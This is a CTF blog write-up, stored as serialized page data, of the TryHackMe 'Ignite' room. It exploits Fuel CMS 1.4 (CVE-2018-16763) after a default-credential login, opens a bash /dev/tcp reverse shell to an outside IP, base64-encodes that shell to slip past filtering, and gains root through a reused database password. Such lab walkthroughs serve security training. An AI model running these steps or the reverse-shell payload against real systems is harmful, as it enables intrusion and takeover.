[{"data":1,"prerenderedAt":394},["ShallowReactive",2],{"\u002F2025\u002Ftryhackme-ignite-writeup":3,"surround-\u002F2025\u002Ftryhackme-ignite-writeup":385},{"_path":4,"_dir":5,"_draft":6,"_partial":6,"_locale":7,"title":8,"description":9,"date":10,"updated":10,"image":11,"categories":12,"recommend":6,"draft":6,"readingTime":14,"body":19,"_type":378,"_id":379,"_source":380,"_file":381,"_stem":382,"_extension":383,"_original_dir":384},"\u002F2025\u002Ftryhackme-ignite-writeup","2025",false,"","TryHackMe - Ignite","In this article, we walk through solving TryHackMe's Ignite room step by step. We gain initial access to the system using a public exploit for a vulnerable version of Fuel CMS and then obtain root privileges by leveraging a reused password found in a database configuration file.","2025-08-25T14:27:41.000Z","https:\u002F\u002Fhackpaper-image-server.pages.dev\u002Fimages\u002Fblogs\u002Ftryhackme-ignite-writeup\u002Fthumbnail.jpg",[13],"CTF",{"text":15,"minutes":16,"time":17,"words":18},"2 min read",1.65,99000,330,{"type":20,"children":21,"toc":372},"root",[22,28,44,51,55,85,89,93,126,130,162,235,239,245,250,254,259,264,269,273,285,291,325,329,333,353,357,362,366],{"type":23,"tag":24,"props":25,"children":27},"element","pic",{"src":26},"https:\u002F\u002Fhackpaper-image-server.pages.dev\u002Fimages\u002Fblogs\u002Ftryhackme-ignite-writeup\u002F1.jpg",[],{"type":23,"tag":29,"props":30,"children":31},"p",{},[32,35],{"type":33,"value":34},"text","Target IP: ",{"type":23,"tag":36,"props":37,"children":41},"a",{"href":38,"rel":39},"https:\u002F\u002Ftryhackme.com\u002Froom\u002Fignite",[40],"nofollow",[42],{"type":33,"value":43},"10.10.161.142",{"type":23,"tag":45,"props":46,"children":48},"h2",{"id":47},"reconnaissance",[49],{"type":33,"value":50},"Reconnaissance",{"type":23,"tag":24,"props":52,"children":54},{"src":53},"https:\u002F\u002Fhackpaper-image-server.pages.dev\u002Fimages\u002Fblogs\u002Ftryhackme-ignite-writeup\u002F2.jpg",[],{"type":23,"tag":29,"props":56,"children":57},{},[58,60,67,69,75,77,83],{"type":33,"value":59},"Only port ",{"type":23,"tag":61,"props":62,"children":64},"code",{"className":63},[],[65],{"type":33,"value":66},"80",{"type":33,"value":68}," is open, and we have a website here and a ",{"type":23,"tag":61,"props":70,"children":72},{"className":71},[],[73],{"type":33,"value":74},"\u002Ffuel",{"type":33,"value":76}," directory, as we can see from ",{"type":23,"tag":61,"props":78,"children":80},{"className":79},[],[81],{"type":33,"value":82},"\u002Frobots.txt",{"type":33,"value":84},".",{"type":23,"tag":24,"props":86,"children":88},{"src":87},"https:\u002F\u002Fhackpaper-image-server.pages.dev\u002Fimages\u002Fblogs\u002Ftryhackme-ignite-writeup\u002F3.jpg",[],{"type":23,"tag":24,"props":90,"children":92},{"src":91},"https:\u002F\u002Fhackpaper-image-server.pages.dev\u002Fimages\u002Fblogs\u002Ftryhackme-ignite-writeup\u002F4.jpg",[],{"type":23,"tag":29,"props":94,"children":95},{},[96,98,104,106,115,117,124],{"type":33,"value":97},"There is a login form in the ",{"type":23,"tag":61,"props":99,"children":101},{"className":100},[],[102],{"type":33,"value":103},"Fuel",{"type":33,"value":105}," directory, and we can log in with the ",{"type":23,"tag":61,"props":107,"children":112},{"className":108,"id":110,"style":111},[109],"example-info","just-like-this","color: #efb11d",[113],{"type":33,"value":114},"admin:admin",{"type":33,"value":116}," pair as specified on the default page and access the interface, but we cannot upload files from the interface as there are too many controls. Instead, we can search for the ",{"type":23,"tag":61,"props":118,"children":121},{"className":119,"id":110,"style":120},[109],"color: #4DFFBE",[122],{"type":33,"value":123},"Fuel CMS 1.4",{"type":33,"value":125}," version on the internet and find any exploits if available.",{"type":23,"tag":24,"props":127,"children":129},{"src":128},"https:\u002F\u002Fhackpaper-image-server.pages.dev\u002Fimages\u002Fblogs\u002Ftryhackme-ignite-writeup\u002F5.jpg",[],{"type":23,"tag":29,"props":131,"children":132},{},[133,135,142,144,151,153,160],{"type":33,"value":134},"We find ",{"type":23,"tag":36,"props":136,"children":139},{"href":137,"rel":138},"https:\u002F\u002Fwww.exploit-db.com\u002Fexploits\u002F47138",[40],[140],{"type":33,"value":141},"CVE-2018-16763",{"type":33,"value":143},". Now let's download this exploit and run it. As you can see, we received an error because we did not configure a proxy. You can resolve this error by deleting the following lines. (While writing this article, I noticed that there are newer versions of these exploits that are more stable. You can use those as well. ",{"type":23,"tag":36,"props":145,"children":148},{"href":146,"rel":147},"https:\u002F\u002Fwww.exploit-db.com\u002Fexploits\u002F49487",[40],[149],{"type":33,"value":150},"1",{"type":33,"value":152},",",{"type":23,"tag":36,"props":154,"children":157},{"href":155,"rel":156},"https:\u002F\u002Fwww.exploit-db.com\u002Fexploits\u002F50477",[40],[158],{"type":33,"value":159},"2",{"type":33,"value":161},")",{"type":23,"tag":163,"props":164,"children":168},"pre",{"className":165,"code":166,"language":167,"meta":7,"style":7},"language-python shiki shiki-themes catppuccin-latte one-dark-pro","# proxy = {\"http\":\"http:\u002F\u002F127.0.0.1:8080\"} # You can turn this line into a comment.\nr = requests.get(burp0_url) # proxies=We deleted the proxy part.\n","python",[169],{"type":23,"tag":61,"props":170,"children":171},{"__ignoreMap":7},[172,184],{"type":23,"tag":173,"props":174,"children":177},"span",{"class":175,"line":176},"line",1,[178],{"type":23,"tag":173,"props":179,"children":181},{"style":180},"--shiki-default:#9CA0B0;--shiki-default-font-style:italic;--shiki-dark:#7F848E;--shiki-dark-font-style:italic",[182],{"type":33,"value":183},"# proxy = {\"http\":\"http:\u002F\u002F127.0.0.1:8080\"} # You can turn this line into a comment.\n",{"type":23,"tag":173,"props":185,"children":187},{"class":175,"line":186},2,[188,194,200,205,210,216,221,226,230],{"type":23,"tag":173,"props":189,"children":191},{"style":190},"--shiki-default:#4C4F69;--shiki-dark:#ABB2BF",[192],{"type":33,"value":193},"r ",{"type":23,"tag":173,"props":195,"children":197},{"style":196},"--shiki-default:#179299;--shiki-dark:#56B6C2",[198],{"type":33,"value":199},"=",{"type":23,"tag":173,"props":201,"children":202},{"style":190},[203],{"type":33,"value":204}," requests",{"type":23,"tag":173,"props":206,"children":208},{"style":207},"--shiki-default:#7C7F93;--shiki-dark:#ABB2BF",[209],{"type":33,"value":84},{"type":23,"tag":173,"props":211,"children":213},{"style":212},"--shiki-default:#1E66F5;--shiki-dark:#61AFEF",[214],{"type":33,"value":215},"get",{"type":23,"tag":173,"props":217,"children":218},{"style":207},[219],{"type":33,"value":220},"(",{"type":23,"tag":173,"props":222,"children":223},{"style":190},[224],{"type":33,"value":225},"burp0_url",{"type":23,"tag":173,"props":227,"children":228},{"style":207},[229],{"type":33,"value":161},{"type":23,"tag":173,"props":231,"children":232},{"style":180},[233],{"type":33,"value":234}," # proxies=We deleted the proxy part.\n",{"type":23,"tag":24,"props":236,"children":238},{"src":237},"https:\u002F\u002Fhackpaper-image-server.pages.dev\u002Fimages\u002Fblogs\u002Ftryhackme-ignite-writeup\u002F6.jpg",[],{"type":23,"tag":45,"props":240,"children":242},{"id":241},"initial-access",[243],{"type":33,"value":244},"Initial Access",{"type":23,"tag":29,"props":246,"children":247},{},[248],{"type":33,"value":249},"Now we can run our exploit.",{"type":23,"tag":24,"props":251,"children":253},{"src":252},"https:\u002F\u002Fhackpaper-image-server.pages.dev\u002Fimages\u002Fblogs\u002Ftryhackme-ignite-writeup\u002F7.jpg",[],{"type":23,"tag":29,"props":255,"children":256},{},[257],{"type":33,"value":258},"As you can see, we can send our commands and receive responses. But as you can see, this shell is unstable and full of parasites. Let's open a reverse shell from here for a clean shell.",{"type":23,"tag":260,"props":261,"children":263},"copy",{"code":262},"bash -i >& \u002Fdev\u002Ftcp\u002F10.21.251.163\u002F4141 0>&1",[],{"type":23,"tag":29,"props":265,"children":266},{},[267],{"type":33,"value":268},"When we run this command directly, we cannot access the shell. This is because the path to this command is long and is being distorted or blocked. Therefore, let's send this command by encoding it. I will use BASE64. (You can directly upload a shell file to the device and run it.)",{"type":23,"tag":260,"props":270,"children":272},{"code":271},"echo \"YmFzaCAtaSA+JiAvZGV2L3RjcC8xMC4yMS4yNTEuMTYzLzQxNDEgMD4mMQ==\" | base64 -d | bash",[],{"type":23,"tag":29,"props":274,"children":275},{},[276,278,284],{"type":33,"value":277},"And as a result, we obtain a shell on the listening port we opened with ",{"type":23,"tag":61,"props":279,"children":281},{"className":280},[],[282],{"type":33,"value":283},"nc -nvlp 4141",{"type":33,"value":84},{"type":23,"tag":45,"props":286,"children":288},{"id":287},"privilege-escalation",[289],{"type":33,"value":290},"Privilege Escalation",{"type":23,"tag":29,"props":292,"children":293},{},[294,296,307,309,314,316,323],{"type":33,"value":295},"Now let's run ",{"type":23,"tag":36,"props":297,"children":300},{"href":298,"rel":299},"https:\u002F\u002Fgithub.com\u002Fpeass-ng\u002FPEASS-ng\u002Freleases\u002Fdownload\u002F20250801-03e73bf3\u002Flinpeas.sh",[40],[301],{"type":23,"tag":61,"props":302,"children":304},{"className":303},[],[305],{"type":33,"value":306},"linpeas.sh",{"type":33,"value":308}," on the target system and perform a scan. (I placed the ",{"type":23,"tag":61,"props":310,"children":312},{"className":311},[],[313],{"type":33,"value":306},{"type":33,"value":315}," file on my ",{"type":23,"tag":173,"props":317,"children":320},{"className":318,"id":110,"style":319},[109],"color: #77BEF0",[321],{"type":33,"value":322},"Apache",{"type":33,"value":324}," server and downloaded it to the target device.)",{"type":23,"tag":24,"props":326,"children":328},{"src":327},"https:\u002F\u002Fhackpaper-image-server.pages.dev\u002Fimages\u002Fblogs\u002Ftryhackme-ignite-writeup\u002F8.jpg",[],{"type":23,"tag":24,"props":330,"children":332},{"src":331},"https:\u002F\u002Fhackpaper-image-server.pages.dev\u002Fimages\u002Fblogs\u002Ftryhackme-ignite-writeup\u002F9.jpg",[],{"type":23,"tag":29,"props":334,"children":335},{},[336,338,344,346,352],{"type":33,"value":337},"Our analysis has identified the file ",{"type":23,"tag":61,"props":339,"children":341},{"className":340,"id":110,"style":120},[109],[342],{"type":33,"value":343},"\u002Fvar\u002Fwww\u002Fhtml\u002Ffuel\u002Fapplication\u002Fconfig\u002Fdatabase.php",{"type":33,"value":345}," as noteworthy. Upon examining the contents of this file, we find the pair ",{"type":23,"tag":61,"props":347,"children":349},{"className":348,"id":110,"style":120},[109],[350],{"type":33,"value":351},"root:mememe",{"type":33,"value":84},{"type":23,"tag":24,"props":354,"children":356},{"src":355},"https:\u002F\u002Fhackpaper-image-server.pages.dev\u002Fimages\u002Fblogs\u002Ftryhackme-ignite-writeup\u002F11.jpg",[],{"type":23,"tag":29,"props":358,"children":359},{},[360],{"type":33,"value":361},"The person may have entered the information they use for the database in the same way as their own information for convenience.",{"type":23,"tag":24,"props":363,"children":365},{"src":364},"https:\u002F\u002Fhackpaper-image-server.pages.dev\u002Fimages\u002Fblogs\u002Ftryhackme-ignite-writeup\u002F12.jpg",[],{"type":23,"tag":367,"props":368,"children":369},"style",{},[370],{"type":33,"value":371},"html .default .shiki span {color: var(--shiki-default);background: var(--shiki-default-bg);font-style: var(--shiki-default-font-style);font-weight: var(--shiki-default-font-weight);text-decoration: var(--shiki-default-text-decoration);}html .shiki span {color: var(--shiki-default);background: var(--shiki-default-bg);font-style: var(--shiki-default-font-style);font-weight: var(--shiki-default-font-weight);text-decoration: var(--shiki-default-text-decoration);}html .dark .shiki span {color: var(--shiki-dark);background: var(--shiki-dark-bg);font-style: var(--shiki-dark-font-style);font-weight: var(--shiki-dark-font-weight);text-decoration: var(--shiki-dark-text-decoration);}html.dark .shiki span {color: var(--shiki-dark);background: var(--shiki-dark-bg);font-style: var(--shiki-dark-font-style);font-weight: var(--shiki-dark-font-weight);text-decoration: var(--shiki-dark-text-decoration);}",{"title":7,"searchDepth":373,"depth":373,"links":374},4,[375,376,377],{"id":47,"depth":186,"text":50},{"id":241,"depth":186,"text":244},{"id":287,"depth":186,"text":290},"markdown","content:posts:2025:tryhackme-ignite-writeup.md","content","posts\u002F2025\u002Ftryhackme-ignite-writeup.md","posts\u002F2025\u002Ftryhackme-ignite-writeup","md","\u002Fposts",[386,390],{"_path":387,"title":388,"date":389},"\u002F2025\u002Ftryhackme-brooklynninenine-writeup","TryHackMe - Brooklyn Nine Nine","2025-08-25T08:28:54.000Z",{"_path":391,"title":392,"date":393},"\u002F2025\u002Ftryhackme-tomghost-writeup","TryHackMe - Tomghost","2025-08-26T07:21:07.000Z",1777022959067]